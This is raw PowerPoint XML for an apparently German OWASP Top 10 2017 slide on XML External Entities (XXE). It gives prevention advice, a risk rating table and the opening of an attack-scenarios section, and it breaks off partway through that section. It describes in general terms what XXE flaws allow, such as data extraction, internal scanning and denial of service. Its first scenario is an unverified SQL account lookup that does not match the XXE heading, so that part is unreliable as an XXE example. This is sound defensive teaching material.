            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Die Schulung von Entwicklern ist unerlässlich, um XXE zu identifizieren und zu beheben. Zusätzlich:</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Verwenden Sie möglichst weniger komplexe Datenformate, wie JSON und vermeiden Sie die </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Serialisierung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> sensibler Daten.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Patchen oder aktualisieren Sie alle XML-Prozessoren und Bibliotheken, die von der Anwendung oder dem zugrunde liegenden Betriebssystem verwendet werden. Verwenden Sie Werkzeuge zur Prüfung von Abhängigkeiten. Aktualisieren Sie auf SOAP 1.2 oder höher.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"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100"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Deaktivieren Sie die Verarbeitung von externen XML-Entitäten und DTDs in allen XML-Parsern in der Anwendung, gemäß dem </a:t>
            </a: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r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. Implementierung einer positiven serverseitigen Eingabevalidierung ("White-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>listing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>"), -filterung oder -bereinigung, um bösartige Daten in XML-Dokumenten, Headern oder Knoten zu verhindern.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Vergewissern Sie sich, dass die Upload-Funktionalität für XML- oder XSL-Dateien eingehende XML-Daten mithilfe der XSD-Validierung oder ähnlichem validiert.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"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100"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>SAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-Tools können helfen, XXE im Quellcode zu erkennen, jedoch ist die manuelle Codeüberprüfung die beste Alternative in großen, komplexen Anwendungen mit vielen Integrationen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Wenn dies nicht möglich ist, sollten Sie die Verwendung von virtuellen Patches, API-Sicherheitsgateways oder Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Firewalls (WAFs) in Betracht ziehen, um XXE-Angriffe zu erkennen, zu überwachen und zu blockieren.</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A4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>:2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>XML External Entities (XXE)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3806702930"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="939600"/>
          <a:ext cx="6836400" cy="22441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de-DE" sz="900" b="1" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Ausnutzbarkeit:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="500" b="1" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1050" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0" noProof="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de-DE" sz="1100" b="1" noProof="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>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de-DE" sz="1000" b="1" baseline="0" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Verbreitung: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1050" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0" noProof="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de-DE" sz="1100" b="0" baseline="0" noProof="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de-DE" sz="1000" b="1" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Auffindbarkeit: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1050" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0" noProof="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de-DE" sz="1100" b="0" kern="1200" baseline="0" noProof="0">
                        <a:solidFill>
                          <a:srgbClr val="FEFFFF"/>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de-DE" sz="1000" b="1" baseline="0" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Technisch: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1050" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0" noProof="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de-DE" sz="1100" b="0" baseline="0" noProof="0">
                        <a:solidFill>
                          <a:srgbClr val="FEFFFF"/>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lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Angreifer können anfällige XML Verarbeiter instrumentalisieren, wenn sie XML direkt hochladen können oder schädliche Inhalte in ein XML-Dokument aufnehmen können, wobei sie anfälligen Code, Abhängigkeiten oder Integrationen ausnutzen.</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lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Standardmäßig erlauben viele ältere XML-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Prozesso</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ren</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> die Spezifikation einer externen Entität, also einer URI, die während der XML-Verarbeitung </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>dereferen</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>-ziert und ausgewertet wird. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId16"/>
                        </a:rPr>
                        <a:t>SAST</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>-Tools können dies erkennen, indem sie Abhängigkeiten und </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Konfigura-tionen</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> überprüfen. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId17"/>
                        </a:rPr>
                        <a:t>DAST</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>-Tools erfordern zusätzliche manuelle Schritte, um dieses Problem zu erkennen und auszunutzen. Manuelle Tester müssen geschult werden, wie man auf XXE testet, was Stand 2017 typischerweise selten passiert.</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de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Diese Fehler können ausgenutzt werden, um Daten zu extrahieren, eine Remote-Anfrage vom Server auszuführen, interne Systeme zu scannen, einen </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Denial</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>of</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>-Service-Angriff oder auch andere Angriffe durchzuführen.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Die Auswirkungen auf das Unter-nehmen hängen vom Schutzbedarf der Anwendung und ihrer Daten ab.</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1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Mögliche Angriffsszenarien</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Szenario 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Eine Anwendung verarbeitet nicht verifizierte Daten in einem SQL-Aufruf, der auf Kontoinformationen zugreift:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pstmt.setString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>acct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>"));</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="900" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ResultSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
